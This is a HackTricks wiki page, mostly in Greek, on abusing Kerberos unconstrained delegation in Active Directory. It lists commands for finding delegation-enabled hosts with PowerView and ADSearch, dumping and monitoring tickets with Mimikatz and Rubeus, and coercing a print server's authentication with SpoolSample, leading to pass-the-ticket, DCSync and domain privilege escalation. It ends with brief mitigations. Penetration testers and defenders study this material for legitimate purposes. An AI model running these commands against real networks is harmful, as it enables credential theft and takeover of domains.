Unconstrained Delegation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Unconstrained delegation

Αυτή είναι μια δυνατότητα που μπορεί να ρυθμίσει ένας Διαχειριστής Τομέα σε οποιονδήποτε Υπολογιστή μέσα στον τομέα. Έτσι, κάθε φορά που ένας χρήστης συνδέεται στον Υπολογιστή, ένα αντίγραφο του TGT αυτού του χρήστη θα σταλεί μέσα στο TGS που παρέχεται από τον DC και θα αποθηκευτεί στη μνήμη στο LSASS. Έτσι, αν έχετε δικαιώματα Διαχειριστή στη μηχανή, θα μπορείτε να dump τα εισιτήρια και να προσποιηθείτε τους χρήστες σε οποιαδήποτε μηχανή.

Έτσι, αν ένας διαχειριστής τομέα συνδεθεί σε έναν Υπολογιστή με ενεργοποιημένη τη δυνατότητα "Unconstrained Delegation", και έχετε τοπικά δικαιώματα διαχειριστή σε αυτή τη μηχανή, θα μπορείτε να dump το εισιτήριο και να προσποιηθείτε τον Διαχειριστή Τομέα οπουδήποτε (domain privesc).

Μπορείτε να βρείτε αντικείμενα Υπολογιστή με αυτό το χαρακτηριστικό ελέγχοντας αν το userAccountControl χαρακτηριστικό περιέχει ADS_UF_TRUSTED_FOR_DELEGATION. Μπορείτε να το κάνετε αυτό με ένα φίλτρο LDAP του ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, το οποίο είναι αυτό που κάνει το powerview:

# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way

# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs

Φορτώστε το εισιτήριο του Διαχειριστή (ή του θύματος χρήστη) στη μνήμη με Mimikatz ή Rubeus για ένα Pass the Ticket. Περισσότερες πληροφορίες: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ Περισσότερες πληροφορίες σχετικά με την Unconstrained delegation στο ired.team.

Force Authentication

Αν ένας επιτιθέμενος είναι σε θέση να συμβιβάσει έναν υπολογιστή που επιτρέπεται για "Unconstrained Delegation", θα μπορούσε να παραπλανήσει έναν Print server να συνδεθεί αυτόματα σε αυτόν αποθηκεύοντας ένα TGT στη μνήμη του διακομιστή. Έτσι, ο επιτιθέμενος θα μπορούσε να εκτελέσει μια επίθεση Pass the Ticket για να προσποιηθεί τον λογαριασμό υπολογιστή του Print server.

Για να κάνετε έναν εκτυπωτή server να συνδεθεί σε οποιαδήποτε μηχανή μπορείτε να χρησιμοποιήσετε SpoolSample:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

Αν το TGT προέρχεται από έναν ελεγκτή τομέα, μπορείτε να εκτελέσετε μια DCSync attack και να αποκτήσετε όλους τους κατακερματισμούς από τον DC. Περισσότερες πληροφορίες σχετικά με αυτήν την επίθεση στο ired.team.

Ακολουθούν άλλοι τρόποι για να προσπαθήσετε να επιβάλετε μια αυθεντικοποίηση:

Force NTLM Privileged Authentication

Mitigation

Περιορίστε τις συνδέσεις DA/Admin σε συγκεκριμένες υπηρεσίες
Ορίστε "Ο λογαριασμός είναι ευαίσθητος και δεν μπορεί να ανατεθεί" για προνομιακούς λογαριασμούς.

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousSkeleton Key NextWindows Security Controls

Last updated 1 month ago